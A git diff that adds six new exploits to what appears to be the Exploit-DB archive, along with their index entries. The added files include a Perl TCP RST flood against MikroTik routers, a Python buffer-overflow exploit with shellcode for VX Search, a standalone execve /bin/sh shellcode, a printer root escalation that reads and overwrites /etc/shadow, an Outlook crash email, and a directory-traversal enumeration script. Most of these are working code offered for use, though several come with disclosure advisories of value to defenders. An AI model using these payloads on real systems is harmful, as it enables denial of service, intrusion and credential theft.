diff --git a/files.csv b/files.csv index 88591ad973..df853665a6 100644 --- a/files.csv +++ b/files.csv @@ -5430,6 +5430,9 @@ id,file,description,date,author,platform,type,port 41741,platforms/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos,0 41742,platforms/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos,0 41743,platforms/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos,0 +41752,platforms/hardware/dos/41752.pl,"MikroTik RouterBoard 6.38.5 - Denial of Service",2017-03-28,FarazPajohan,hardware,dos,0 +41755,platforms/windows/dos/41755.py,"VX Search Enterprise 9.5.12 - 'Verify Email' Buffer Overflow",2017-03-28,ScrR1pTK1dd13,windows,dos,0 +41756,platforms/windows/dos/41756.txt,"Microsoft Outlook - HTML Email Denial of Service",2017-03-28,"Haifei Li",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8893,6 +8896,7 @@ id,file,description,date,author,platform,type,port 41721,platforms/windows/local/41721.c,"Forticlient 5.2.3 Windows 10 x64 (Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0 41722,platforms/windows/local/41722.c,"Forticlient 5.2.3 Windows 10 x64 (Post Anniversary) - Privilege Escalation",2017-03-25,sickness,windows,local,0 41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0 +41754,platforms/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",hardware,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15399,6 +15403,7 @@ id,file,description,date,author,platform,type,port 41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0 41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0 41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443 +41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16029,6 +16034,7 @@ id,file,description,date,author,platform,type,port 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0 +41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 diff --git a/platforms/hardware/dos/41752.pl b/platforms/hardware/dos/41752.pl new file mode 100755 index 0000000000..16dce410fd --- /dev/null +++ b/platforms/hardware/dos/41752.pl @@ -0,0 +1,106 @@ +#!/usr/local/bin/perl + +use Socket; + +$src_host =3D $ARGV[0];=20 +$src_port =3D $ARGV[1];=20 +$dst_host =3D $ARGV[2];=20 +$dst_port =3D $ARGV[3];=20 + +if(!defined $src_host or !defined $src_port or !defined $dst_host or !defin= +ed $dst_port)=20 +{ +=09 +=09print "Usage: $0 \n"; +=09exit; +}=20 +else=20 +{ +=09 +=09main(); +} +=20 +sub main=20 +{ +=09my $src_host =3D (gethostbyname($src_host))[4]; +=09my $dst_host =3D (gethostbyname($dst_host))[4]; +=09$IPROTO_RAW =3D 255; +=09socket($sock , AF_INET, SOCK_RAW, $IPROTO_RAW)=20 +=09=09or die $!; +=09my ($packet) =3D makeheaders($src_host, $src_port, $dst_host, $dst_port)= +; +=09my ($destination) =3D pack('Sna4x8', AF_INET, $dst_port, $dst_host); +=09while(1) +=09{ +=09=09send($sock , $packet , 0 , $destination) +=09=09=09or die $!; +=09} +} + +sub makeheaders=20 +{ +=09$IPPROTO_TCP =3D 6; +=09local($src_host , $src_port , $dst_host , $dst_port) =3D @_; +=09my $zero_cksum =3D 0; +=09my $tcp_len =3D 20; +=09my $seq =3D 19456; +=09my $seq_ack =3D 0; +=09my $tcp_doff =3D "5"; +=09my $tcp_res =3D 0; +=09my $tcp_doff_res =3D $tcp_doff . $tcp_res; +=09my $tcp_urg =3D 0;=20 +=09my $tcp_ack =3D 0; +=09my $tcp_psh =3D 0; +=09my $tcp_rst =3D 1; +=09my $tcp_syn =3D 0; +=09my $tcp_fin =3D 0; +=09my $null =3D 0; +=09my $tcp_win =3D 124; +=09my $tcp_urg_ptr =3D 44; +=09my $tcp_flags =3D $null . $null . $tcp_urg . $tcp_ack . $tcp_psh . $tcp_= +rst . $tcp_syn . $tcp_fin ; +=09my $tcp_check =3D 0; +=09my $tcp_header =3D pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $s= +eq_ack , $tcp_doff_res, $tcp_flags, $tcp_win , $tcp_check, $tcp_urg_ptr); +=09my $tcp_pseudo =3D pack('a4a4CCn' , $src_host, $dst_host, 0, $IPPROTO_TC= +P, length($tcp_header) ) . $tcp_header; +=09$tcp_check =3D &checksum($tcp_pseudo); +=09my $tcp_header =3D pack('nnNNH2B8nvn' , $src_port , $dst_port , $seq, $s= +eq_ack , $tcp_doff_res, $tcp_flags, $tcp_win , $tcp_check, $tcp_urg_ptr); +=09my $ip_ver =3D 4; +=09my $ip_len =3D 5; +=09my $ip_ver_len =3D $ip_ver . $ip_len; +=09my $ip_tos =3D 00; +=09my $ip_tot_len =3D $tcp_len + 20; +=09my $ip_frag_id =3D 19245; +=09my $ip_ttl =3D 25; +=09my $ip_proto =3D $IPPROTO_TCP;=09 +=09my $ip_frag_flag =3D "010"; +=09my $ip_frag_oset =3D "0000000000000"; +=09my $ip_fl_fr =3D $ip_frag_flag . $ip_frag_oset; +=09my $ip_header =3D pack('H2CnnB16CCna4a4',=09$ip_ver_len, $ip_tos, $ip_to= +t_len, $ip_frag_id,=09$ip_fl_fr , $ip_ttl , $ip_proto , $zero_cksum , $src_= +host , $dst_host); +=09my $pkt =3D $ip_header . $tcp_header; +=09return $pkt; +} +sub checksum=20 +{ +=09my ($msg) =3D @_; +=09my ($len_msg,$num_short,$short,$chk); +=09$len_msg =3D length($msg); +=09$num_short =3D $len_msg / 2; +=09$chk =3D 0; +=09 +=09foreach $short (unpack("S$num_short", $msg))=20 +=09{ +=09=09$chk +=3D $short; +=09} +=09 +=09$chk +=3D unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2; +=09$chk =3D ($chk >> 16) + ($chk & 0xffff); +=09 +=09return(~(($chk >> 16) + $chk) & 0xffff); +}=20 + + diff --git a/platforms/hardware/local/41754.txt b/platforms/hardware/local/41754.txt new file mode 100755 index 0000000000..a3b8d1a597 --- /dev/null +++ b/platforms/hardware/local/41754.txt @@ -0,0 +1,140 @@ +# TITLE: Intermec Industrial Printers Local root with Busybox jailbreak + +# Date: March 28th, 2017 +# Author: Bourbon Jean-marie (kmkz) from AKERVA company | @kmkz_security + +# Product Homepage: + http://www.intermec.com/products/prtrpm43a/ + +# Firmware download: + http://www.intermec.com/products/prtrpm43a/downloads.aspx + +# Tested on : + model: PM43 RFID Industrial printer + firmware version: 10.10.011406 + kernel: Linux PM43-xxxxxxx 2.6.31 #1 PREEMPT Mon Oct 26 10:49:59 SGT 2015 armv5tejl GNU/Linux + +# CVSS: 7.5 (CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H) +# OVE ID: OVE-20170131-0001 +# CVE ID: CVE-2017-5671 +# OSVDB ID: n/a + +# Thanks: + Dany Bach (Rioru) from AKERVA company for the exploitation design during the pentest during which the CVE-2017-5671 was discovered | @DDXhunter + Honeywell team which was really reactive (with special thanks to Kevin Staggs) ! + +# Credits: + The security notification that Intermec (Honeywell) sent to all of their dealers: + https://github.com/kmkz/exploit/blob/master/CVE-2017-5671-Credits.pdf + +# Additional ressource: + https://akerva.com/blog/intermec-industrial-printers-local-root-with-busybox-jailbreak/ + +# Affected products: + PM23, PM42, PM43, PC23, PC43, PD43 and PC42 printers with versions prior to March 2017 + +# Fixes: + Download the new firmware version by using the link below: + http://epsfiles.intermec.com/eps_files/eps_download/Firmware_P10.11.013310.zip + +# Release note: + http://apps.intermec.com/downloads/eps_download/Firmware%20Release%20Notes%20x10_11_013310.pdf + + +Intermec (Honeywell) Industrial RFID Printers Local root privilege escalation with Busybox jailbreak + +I. PRODUCT + +PM43/PM43c mid-range industrial RFID printers are ideal for a wide range of applications within the distribution center / warehouse and manufacturing environments. + +II. ADVISORY + +Using a bad file permission, it is possible to gain full root privilege on a PM43 industrial printer as well as from the admin account than it-admin which are the two default users on the machine. +It also permits to gain full privilege resulting on a Busybox jailbreak due to the root access on the system. +The impact of this exploitation is quite critical due to the sensitive information that are available and impact the recent firmware version release (before March 12th 2017). + +III. VULNERABILITY DESCRIPTION + +The Lua binary rights are too permissive and this one is SUID which conduct to perform this privilege escalation using a basic trick as describe in the next section. +The default it-admin and/or admin credentials are available in the vendor's documentation and should be modified too. + +IV. PROOF OF CONCEPT + +Following steps can reproduce the privilege escalation once the attacker gain a Busybox shell on the system: + +itadmin@PM43-XXXXXXXXXXX /tmp$ find / -perm -g=s -type f 2>/dev/null +/bin/busybox +/usr/bin/cfg +/usr/bin/lua <----- Lua binary with SUID perm. +/usr/bin/httpd_restore +/usr/bin/ikev2 +/usr/bin/pwauth +/usr/bin/functest +/usr/bin/imecutil +/usr/bin/httpd_fwupgrade +/usr/sbin/setkey + +We then try to execute a shell command using Lua but it seems that this one is executed with non-root privileges through the Busybox shell: + +itadmin@PM43-XXXXXXXXXXX /tmp$ /usr/bin/lua +Lua 5.1.4 Copyright (C) 1994-2008 Lua.org, PUC-Rio +> os.execute("id") +uid=1(itadmin) gid=1(itadmin) groups=1(itadmin),2(admin),3(user) + +So we identify that it is possible to read/write files with root privilege on the file system without any restrictions (we will be able to modify the shadow file in order to log in as root later): + +// in the Lua interpreter: + +> f=io.open("/etc/shadow","rb") +> print(f) +file (0x17af0) +> c=f:read "*a" +> print(c) +root:!$1$XPCuiq25$IvWw/kKeomOyQIee8XfTb1:11851:0:99999:7::: +admin:$1$Ma/qTlIw$PPPTgRVCnkqcDQxjMBtsC0:11851:0:99999:7::: +itadmin:$1$kcHXJUjT$OIgLfTDgaEAlTbHRZFPsj.:11851:0:99999:7::: +user::11851:0:99999:7::: +ftp:*:11851:0:99999:7::: +nobody:*:11851:0:99999:7::: +lighttpd:x:1000:1000:Linux User,,,:/home/lighttpd:/bin/sh + +We conclude this "proof of concept" by writing a file on the filesystem which demonstrate the possibilities that we now have using this kind of code: + +fp = io.popen("akerva", "w") +fp:write(anything) +fp:close() + +That gave us the following output: + +itadmin@PM43-XXXXXXXXXXX /tmp$ cat akerva +AKERVA r00t +itadmin@PM43-XXXXXXXXXXX /tmp$ ls -alsh akerva + 4 -rw-rw-r-- 1 root root 12 Jan 25 07:12 akerva + +As explained in the above text, we then over-writed the "etc/shadow" file and we validated that it is possible to gain full root access on the filesystem even if Busybox 1.15.0 (2009 release) were present, bypassing +its shell restrictions (jailbreaking it). + +V. RECOMMENDATIONS + +AKERVA's Pentesters recommended to fix it by modifying the Lua binary rights (is the SUID bit necessary?) which was done in the patched firmware. +A security fix is now available in order to mitigate this issue as shown at the beginning of this advisory. + +VI. VERSIONS AFFECTED + +This issue affects the firmware version 10.10.011406 but after reading the latest release notes it also seems to impact all versions that were released before the updated firmware. + +VII. TIMELINE + +January 19th, 2017: Vulnerability identification +January 27th, 2017: First contact with the editor (Honeywell) +January 31th, 2017: Advisory submission to Honeywell security team and CVE id request +February 1st, 2017: CVE id attributed by MITRE even if the vendor is not normally considered a priority for CVE by MITRE +February 6th, 2017: Vendor confirm the vulnerability +February 16th, 2017: Vendor inform that the fix is ready (They also proposed me to test it prior to release) +March 12th, 2017: New firmware version available +March 28th, 2017: Public advisory released + +VIII. LEGAL NOTICES + +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of this advisory. diff --git a/platforms/lin_x86-64/shellcode/41750.txt b/platforms/lin_x86-64/shellcode/41750.txt new file mode 100755 index 0000000000..ed00318fd5 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/41750.txt @@ -0,0 +1,63 @@ +;================================================================================ +; The MIT License +; +; Copyright (c) +; +; Permission is hereby granted, free of charge, to any person obtaining a copy +; of this software and associated documentation files (the "Software"), to deal +; in the Software without restriction, including without limitation the rights +; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +; copies of the Software, and to permit persons to whom the Software is +; furnished to do so, subject to the following conditions: +; +; The above copyright notice and this permission notice shall be included in +; all copies or substantial portions of the Software. +; +; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +; THE SOFTWARE. +;================================================================================ +; Name : Linux/x86-64 - execve("/bin/sh") 21 Bytes +; Author : WangYihang +; Email : wangyihanger@gmail.com +; Tested on: Linux_x86-64 +;================================================================================ +; Shellcode (c array) : +char shellcode[] = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69" + "\x6e\x2f\x2f\x73\x68\x57\x48\x89" + "\xe7\xb0\x3b\x0f\x05"; +;================================================================================ +; Shellcode (python) : +shellcode = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05" +;================================================================================ +; objdump -d ./shellcode +shellcode: file format elf64-x86-64 +Disassembly of section .text: +0000000000400080 <_start>: + 400080: f7 e6 mul %esi + 400082: 50 push %rax + 400083: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi + 40008a: 2f 73 68 + 40008d: 57 push %rdi + 40008e: 48 89 e7 mov %rsp,%rdi + 400091: b0 3b mov $0x3b,%al + 400093: 0f 05 syscall +;================================================================================ +; Assembly language code : +; You can asm it by using : +; nasm -f elf64 ./shellcode.asm +; ld -o shellcode shellcode.o +global _start + _start: + mul esi + push rax + mov rdi, "/bin//sh" + push rdi + mov rdi, rsp + mov al, 59 + syscall +;================================================================================ \ No newline at end of file diff --git a/platforms/windows/dos/41755.py b/platforms/windows/dos/41755.py new file mode 100755 index 0000000000..4c18c9b205 --- /dev/null +++ b/platforms/windows/dos/41755.py @@ -0,0 +1,58 @@ +author = ''' + + ############################################## + # Created: ScrR1pTK1dd13 # + # Name: Greg Priest # + # Mail: ScR1pTK1dd13.slammer@gmail.com # + ############################################## + +# Exploit Title: VX Search Enterprise v9.5.12 email verify exploit +# Date: 2017.03.28 +# Exploit Author: Greg Priest +# Version: VX Search Enterprise v9.5.12 +# Tested on: Windows7 x64 HUN/ENG Professional +''' + + +import socket + +port = 25 +s = socket.socket() +ip = '127.0.0.1' +s.bind((ip, port)) +s.listen(5) + +overflow = "A" * 256 +eip = "\x7A\xB7\x1B\x65" +# Search NO ASLR with mona.py +#"\x94\x21\x1C\x65" NO ASLR QtGui4.dll +#"\x7A\xB7\x1B\x65" NO ASLR QtGui4.dll +#"\x09\xc9\x1D\x65" NO ASLR QtGui4.dll +nop = "\x90" * 12 +#calc.exe +shellcode =( +"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + +"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" + +"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" + +"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" + +"\x57\x78\x01\xc2\x8b\x7a\x20\x01" + +"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" + +"\x45\x81\x3e\x43\x72\x65\x61\x75" + +"\xf2\x81\x7e\x08\x6f\x63\x65\x73" + +"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" + +"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" + +"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" + +"\xb1\xff\x53\xe2\xfd\x68\x63\x61" + +"\x6c\x63\x89\xe2\x52\x52\x53\x53" + +"\x53\x53\x53\x53\x52\x53\xff\xd7") + +exploit = overflow+eip+nop+shellcode + +print "Listening on port:", port + +while True: + conn, addr = s.accept() + conn.send(exploit+'\r\n') + conn.close() + print "" + print "Succesfully exploitation!" diff --git a/platforms/windows/dos/41756.txt b/platforms/windows/dos/41756.txt new file mode 100755 index 0000000000..6dedbb2990 --- /dev/null +++ b/platforms/windows/dos/41756.txt @@ -0,0 +1,94 @@ +Source: https://justhaifei1.blogspot.ca/2017/03/an-interesting-outlook-bug.html + +When you send this email to someone, when he/she *just read* the email, Outlook will crash. MSRC told me that they think it's a non-exploitable bug and it seems that they are not going to fix it in near future, I'm releasing the details in this quick write-up, and hopefully, for an "old pedant" style open discussion about the exploitability as I still have some doubts.:-) + +The PoC could be as simple as the following, or you may download the .eml file below. + +Content-Type: multipart/alternative; boundary="===============111111111111== +MIME-Version: 1.0 +Subject: title +From: aa@msft.com +To: bb@msft.com + +--===============111111111111== +Content-Type: text/plain; charset="us-ascii" +MIME-Version: 1.0 +Content-Transfer-Encoding: 7bit + +plain text area +--===============111111111111== +Content-Type: text/html; charset="us-ascii" +MIME-Version: 1.0 + + + + + + +
+e +
+
+ + + +
+
+
+e +
+ + + +--===============111111111111==-- + + +If you do some tests based on the PoC you will quickly figure out that the CSS code "" is something important here. For example, if we remove this line, Outlook won't crash. This also suggests that the bug is related to some "CSS rendering" code in Outlook. + + +The Crash + +The following crash should be observed on Office 2010 14.0.7177.5000, full updated as of March 21, 2017. In fact, I believe it affects all Outlook versions. + +(384.400): Access violation - code c0000005 (!!! second chance !!!) +eax=0020f580 ebx=0ea72288 ecx=00000000 edx=00000000 esi=191cdfd0 edi=5d064400 +eip=5c5e17e5 esp=0020f56c ebp=0020f754 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 +wwlib!DllGetLCID+0x25b35f: +5c5e17e5 f781e402000000040000 test dword ptr [ecx+2E4h],400h ds:0023:000002e4=???????? +0:000> k +ChildEBP RetAddr +WARNING: Stack unwind information not available. Following frames may be wrong. +0020f754 5c5a2b93 wwlib!DllGetLCID+0x25b35f +0020f774 5c1d80de wwlib!DllGetLCID+0x21c70d +0020f794 5c1d801b wwlib!GetAllocCounters+0x51906 +0020f818 5c1d5c33 wwlib!GetAllocCounters+0x51843 +0020f82c 5c26d803 wwlib!GetAllocCounters+0x4f45b +0020f83c 2f63f1b6 wwlib!GetAllocCounters+0xe702b +0020f880 2f63f06b outlook!GetMsoInst+0x32e2 +0020f8a8 2ffb9d6b outlook!GetMsoInst+0x3197 +0020f938 76b0ef1c outlook!PushSavedKeyToCicero+0x291d8 +0020f944 7733367a kernel32!BaseThreadInitThunk+0xe +0020f984 7733364d ntdll!__RtlUserThreadStart+0x70 +0020f99c 00000000 ntdll!_RtlUserThreadStart+0x1b + +It crashes at the following address: + +.text:31B417D2 loc_31B417D2: ; CODE XREF: sub_31714D18+42CB1Ej +.text:31B417D2 lea eax, [ebp+var_1DC] +.text:31B417D8 push eax +.text:31B417D9 push [ebp+var_4] +.text:31B417DC push ebx +.text:31B417DD call sub_3177CE19 ;memory data at eax will be updated +.text:31B417E2 mov ecx, [eax+48h] ;read the pointer at offset 0x48 +.text:31B417E5 test dword ptr [ecx+2E4h], 400h ;crash + + +Since the data pointed by EAX (@31B417E2) will be updated in function "sub_3177CE19", I did some debugging in that function, and it seems that: +There seems to be a custom heap allocator, as I've seen heap block headers, and links. +The "sub_3177CE19" does the job locating the data based on the 1st param (a pointer) and 2nd param (always be 0), and the data will be copied to the heap block pointed by the 3nd param. +According to my tests, the copied bytes are always 0x00, so that's why it seems to be a null pointer dereference bug. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41756.zip \ No newline at end of file diff --git a/platforms/windows/remote/41751.txt b/platforms/windows/remote/41751.txt new file mode 100755 index 0000000000..d7de8613ff --- /dev/null +++ b/platforms/windows/remote/41751.txt @@ -0,0 +1,264 @@ +[+] Credits: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/DZSOFT-v4.2.7-PHP-EDITOR-FILE-ENUMERATION.txt +[+] ISR: ApparitionSec + + + +Vendor: +============== +www.dzsoft.com + + + +Product: +========================= +DzSoft PHP Editor v4.2.7 + +DzSoft PHP Editor is a tool for writing and testing PHP and HTML pages. + + + +Vulnerability Type: +==================== +File Enumeration + + + + +CVE Reference: +============== +N/A + + + +Security Issue: +================ +DzSoft comes with a built-in web server used to preview PHP files, the built-in web server is prone to file enumeration +attacks when combining "HEAD" method HTTP requests with directory traversal "\../../" type attacks. This can aid attackers +in information gathering (File enumeration) to help in possibly furthering attacks. + +On install DzSoft users get Windows network warning like: + +"Allow Dzsoft to communicate on these networks:" + +Private networks, such as my home or work network + +Public networks, such as those in airports and coffee shops (not recommended). + +This selection will create Firewall rule and determine remote connections allowed to DzSoft editors built-in server. +Then when remote user make HTTP request to DzSoft they will get HTTP 403 Forbidden from the built-in web server. + +e.g. + +curl -v "http://VICTIM-IP/\../mysql/data/mysql.pid" + + +< HTTP/1.1 403 Forbidden +< Content-Type: text/html +< Content-Length: 1554 +< + + + 403 Forbidden + + + + + + + + + + + + +

Forbidden

+

For security reasons, you cannot access the built-in web server of DzSoft PHP Editor from another computer.

+

If you see this message within DzSoft PHP Editor's window, or if you think that there might be reasons to enable access from other computers, + + +* Connection #0 to host x.x.x.x left intact + + + +However, this 403 Forbidden access control can be bypassed by malicious users to "stat" files in and outside the webroot. + +e.g. mysql directory. + +File enumeration Conditions: + +These setting is found under Run / Run Options / Paramaters tab + +a) DZSoft built-in web server is running +b) DZSoft built-in web servers "REMOTE_HOST=x.x.x.x" and "REMOTE_ADDR=x.x.x.x" is set to a real IP other than localhost. + +For POC create and save a PHP file under XAMPP/htdocs and run DzSoft built-in web server in preview mode. + +Next make request for "mysql/my-huge.ini" to see if exists. + + +C:\>curl -v -I "http://VICTIM-IP/\../mysql/my-huge.ini" +* Trying VICTIM-IP... +* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0) +> HEAD /\../mysql/my-huge.ini HTTP/1.1 +> User-Agent: curl/7.41.0 +> Host: VICTIM-IP +> Accept: */* +> +< HTTP/1.1 200 OK +HTTP/1.1 200 OK +< Content-Type: +Content-Type: +< Content-Length: 5057 +Content-Length: 5057 +< Cache-Control: no-cache +Cache-Control: no-cache + + +Checking for "mysql.pid" +///////////////////////// + + +C:\>curl -v -I "http://VICTIM-IP/\../mysql/data/mysql.pid" +* Trying VICTIM-IP... +* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0) +> HEAD /\../mysql/data/mysql.pid HTTP/1.1 +> User-Agent: curl/7.41.0 +> Host: VICTIM-IP +> Accept: */* +> +< HTTP/1.1 200 OK +HTTP/1.1 200 OK +< Content-Type: +Content-Type: +< Content-Length: 5 +Content-Length: 5 +< Cache-Control: no-cache +Cache-Control: no-cache +< Expires: 0 + + +Checking for "xampp_shell.bat" +/////////////////////////////// + +C:\>curl -v -I "http://VICTIM-IP/\../xampp_shell.bat" +* Trying VICTIM-IP... +* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0) +> HEAD /\../xampp_shell.bat HTTP/1.1 +> User-Agent: curl/7.41.0 +> Host: VICTIM-IP +> Accept: */* +> +< HTTP/1.1 200 OK +HTTP/1.1 200 OK +< Content-Type: +Content-Type: +< Content-Length: 1084 +Content-Length: 1084 +< Cache-Control: no-cache + + +These also work... + + +[root@localhost local]# wget -S --spider "http://VICTIM-IP:8080/\../mysql/my-huge.ini" +--10:26:21-- http://VICTIM-IP:8080/%5C../mysql/my-huge.ini +Connecting to VICTIM-IP:8080... connected. +HTTP request sent, awaiting response... + HTTP/1.0 200 OK + Content-Type: + Content-Length: 5057 + Cache-Control: no-cache + Expires: 0 +Length: 5057 (4.9K) [] +200 OK + + +[root@localhost local]# wget -S --spider "http://VICTIM-IP:8080/\../mysql/my-innodb-heavy-4G.ini" +--10:29:03-- http://VICTIM-IP:8080/%5C../mysql/my-innodb-heavy-4G.ini +Connecting to VICTIM-IP:8080... connected. +HTTP request sent, awaiting response... + HTTP/1.0 200 OK + Content-Type: + Content-Length: 20906 + Cache-Control: no-cache + Expires: 0 +Length: 20906 (20K) [] +200 OK + + +Tested Windows XAMPP, Linux / curl +curl 7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 + + +////////////////////////////////////////// + +Next, target files on C:\ Drive. + +Bypass 401 Forbidden to enumerate a file on C:\ drive named "hi.txt" +wget "http://127.0.0.1:8088/c/hi.txt" -c --header="Range: bytes=0" + + + +Exploit/POC: +============= +In DZSoft PHP Editor + +1) Change DzSoft web server options for remote address to IP other than localhost. +2) Create test PHP file deploy under xampp/htdocs or whatever Apache your using. +3) Start DzSofts built-in webserver to preview PHP file + +Then, + + +import socket + +print 'DzSoft File Enumeration POC' +print 'Hyp3rlinx / ApparitionSec' + +IP=raw_input("[IP]>") +PORT=int(raw_input("[PORT]>")) +DEPTH=int(raw_input("[DEPTH]>")) +FILE=raw_input("[FILE]>") +ENUM="HEAD "+"/\\" +ENUM+="../"*DEPTH+FILE+ " HTTP/1.0\r\n\r\n" + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect((IP,PORT)) +s.send(ENUM) +print 'Enumerating file:' +print ENUM +output = s.recv(128) +print output +s.close() + + + + +Network Access: +=============== +Remote + + + +Severity: +========= +Medium + + + +Disclosure Timeline: +================================== +Vendor Notification: No reply +March 27, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file